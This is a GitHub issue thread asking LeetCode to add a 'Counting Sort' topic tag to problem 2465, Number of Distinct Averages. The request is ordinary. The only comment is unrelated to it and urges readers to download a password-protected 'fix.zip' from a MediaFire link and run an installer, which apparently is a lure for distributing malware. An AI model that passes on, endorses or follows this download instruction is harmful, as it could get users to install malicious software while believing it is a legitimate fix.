### ISSUE TITLE
Missing "Related Topic" - 2465. Number of Distinct Averages

### ISSUE THREAD

**Issue by ejini6969** [LeetCode-Feedback/LeetCode-Feedback#23731]
### LeetCode Username

https://leetcode.com/u/ejini6969/

### Problem Number, Title, and Link

[2465. Number of Distinct Averages](https://leetcode.com/problems/number-of-distinct-averages/)

### Bug Category

Incorrect or missing "Related Topics"

### Bug Description

`Counting Sort` tag should be added since the input constraints are small.

![image](https://github.com/user-attachments/assets/5a09cada-42bf-4062-94f4-1ef293ca8188)

### Language Used for Code

None

### Expected behavior

Users can collectively train on more counting sort problems which are quite few.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
